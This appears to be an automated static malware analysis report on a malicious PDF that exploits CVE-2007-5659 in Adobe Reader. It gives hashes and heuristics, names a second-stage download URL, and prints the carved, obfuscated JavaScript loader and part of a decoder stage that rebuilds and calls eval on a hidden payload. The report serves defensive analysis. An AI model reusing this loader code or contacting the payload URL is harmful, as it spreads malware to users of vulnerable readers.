Malicious PDF — malware analysis report

Static analysis result for SHA-256 70541a8005910710…

Verdict: MALICIOUS
File type: PDF
Size: 15.2 KB
MD5: 226078fa6be384fc161ff911dfe0abfd
SHA-1: 5962cf9db9dbca4e6b40930460b1b34934501ba0
SHA-256: 70541a80059107106431f90b5f420e518cca0e28be287dc963bc98a8afd7a34f
Risk Score: 366

Malware Insights

MITRE ATT&CK
  • T1203 Exploitation for Client Execution
  • T1059.007 JavaScript

The PDF file contains obfuscated JavaScript that exploits CVE-2007-5659 in Adobe Reader. The script is designed to download and execute a second-stage payload from the URL http://searchfunes.org/cgi-bin/153/n002106204r0409X1d8f2d6fY7f449450. The presence of multiple JavaScript exploit-related heuristics and a high ML classifier score indicates malicious intent.

Machine Learning

  • Nyx PDF Classifier: malicious score 1.0000

Heuristics (10)

  • Collab.collectEmailInfo — CVE-2007-5659 [critical; CVE exact; CVE_2007_5659]
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after static deobfuscation)
  • JavaScript action [low; 5 related findings; PDF_JAVASCRIPT]
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) [high; CVE likely; PDF_JS_ADOBE_APSB08_13_PATCH_GATE]
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster [critical; PDF_JS_EXPLOIT_CLUSTER]
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Obfuscated multi-stage PDF JavaScript dropper [high; PDF_JS_OBFUSCATED_DROPPER]
    PDF JavaScript shows 5 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, hex_dashed_payload, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
  • PDF JavaScript shellcode contains an embedded download URL [high; PDF_JS_SHELLCODE_DOWNLOAD_URL]
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream [low; PDF_JS]
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35901 [critical; CLAMAV_DETECTION]
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • Suspicious extracted artifact [info; EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info; EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://searchfunes.org/cgi-bin/153/n002106204r0409X1d8f2d6fY7f449450 (referenced by PDF JavaScript)

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename: javascript_obj0005_000.js
SHA-256: 4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d
Kind: pdf-javascript-stream
Source: PDF /JS object 5 at offset 0x148
Size: 469 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
Filename: legacy_pdfkit_stage_000.js
SHA-256: fb2a64d56a89841f199fa93792391eba0513aeab3625e869e4e70a6e6d9796ac
Kind: deobfuscated-js
Source: repeated-marker hex decoded JavaScript at offset 0x199B
Size: 12289 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function ty_6wQdaw(SOS07Jyb, wMFy_10){var h_2_236YX = 20;var IyKX5_248h2m_5l = 0;var T7_uc4E = 512;var G38wEW4KX84g_k = h_2_236YX;var tl4D_aGMH__1_8 = "";var kH_6s3BD8431He = 4;var b_FK7Eg = this;var bP7T3N_Mt = "1234ee";var Tw5_VM047Rt_nDr = arguments;try {var G_____l_J081 = 0;if (app) {G38wEW4KX84g_k = G38wEW4KX84g_k + 2;wMFy_10 = pr[G_____l_J081].subject;}bP7T3N_Mt = bP7T3N_Mt.replace(/\d+/, "call");} catch(e) { }G38wEW4KX84g_k = G38wEW4KX84g_k - h_2_236YX;var fP6__14RpP = new Array();var t_t__C_03__yX_H = 150;if (t_t__C_03__yX_H > 0) {fP6__14RpP[0] = t_t__C_03__yX_H;fP6__14RpP[1] = T7_uc4E;fP6__14RpP[0] = fP6__14RpP[0] - t_t__C_03__yX_H;fP6__14RpP[2] = fP6__14RpP[0];fP6__14RpP[1] = fP6__14RpP[1] - T7_uc4E;fP6__14RpP[3] = fP6__14RpP[1];}if (SOS07Jyb) { fP6__14RpP = SOS07Jyb;}if (!SOS07Jyb) {var Cem_kGA1_j1 = Tw5_VM047Rt_nDr[bP7T3N_Mt].toString();var HORm18rD = 0;var XqB0XW7a52O__7 = HORm18rD;t_t__C_03__yX_H = t_t__C_03__yX_H - 102;var j10kTX8HH2px = 0;while(XqB0XW7a52O__7 < Cem_kGA1_j1.length) {j10kTX8HH2px = Cem_kGA1_j1.charCodeAt(XqB0XW7a52O__7);if (j10kTX8HH2px >= t_t__C_03__yX_H && j10kTX8HH2px <= 57) {if (HORm18rD == kH_6s3BD8431He) {HORm18rD = -1;}if (HORm18rD < 0) { HORm18rD = 0; }fP6__14RpP[HORm18rD] += j10kTX8HH2px;if (fP6__14RpP[HORm18rD] > T7_uc4E) {fP6__14RpP[HORm18rD] -= T7_uc4E;}HORm18rD = HORm18rD + 1;}XqB0XW7a52O__7 = XqB0XW7a52O__7 + 1;}}var M_6A__T_Np = 0;var J5Ke45Qql = 0;var uG___P = -1;var lg_6__5 = 0;var j1___3VQu = 0;do {var Su___0iBFD = 256;if (fP6__14RpP[lg_6__5] > Su___0iBFD) {fP6__14RpP[lg_6__5] -= Su___0iBFD;}lg_6__5 = lg_6__5 + 1;} while (lg_6__5 < kH_6s3BD8431He);lg_6__5 = lg_6__5 - kH_6s3BD8431He;while(lg_6__5 < wMFy_10.length) {var N55_1__6 = wMFy_10.substr(lg_6__5, 1) + ' V V ';lg_6__5 = lg_6__5 + 1;var SnoD0D = parseInt(N55_1__6, h_2_236YX);if (uG___P != -1) {J5Ke45Qql += SnoD0D;if (M_6A__T_Np == kH_6s3BD8431He) {M_6A__T_Np = 0;}var AY207iciN_1__v6 = J5Ke45Qql;AY207iciN_1__v6 = AY207iciN_1__v6 - (j1___3VQu + 2) * 
fP6__14RpP[M_6A__T_Np];if (AY207iciN_1__v6 <= 0) {AY207iciN_1__v6 = AY207iciN_1__v6 - Math.floor(AY207iciN_1__v6 / 256) * 256;}AY207iciN_1__v6 = String.fromCharCode(AY207iciN_1__v6);if (G38wEW4KX84g_k == 1) {tl4D_aGMH__1_8 += SnoD0D;} else if (G38wEW4KX84g_k == 2) {tl4D_aGMH__1_8 += AY207iciN_1__v6;} else {tl4D_aGMH__1_8 += lg_6__5;uG___P = -2;}uG___P = -1;M_6A__T_Np = M_6A__T_Np + 1;j1___3VQu = j1___3VQu + 1;} else if (uG___P == -1) {uG___P = h_2_236YX;J5Ke45Qql = SnoD0D * h_2_236YX;}}var BQL_J_33E = this;BQL_J_33E['ev'+'al'](tl4D_aGMH__1_8);}
	ty_6wQdaw(0, "
... (truncated)
Filename: deobfuscated.js
SHA-256: 50c80518460b20a4f5e20bd794c430f1adc10bf9d03c239e68d5efb5459837cf
Kind: deobfuscated-js
Source: PDF JavaScript deobfuscation pass
Size: 76560 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 9 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app.eval(buf);
}

... (truncated)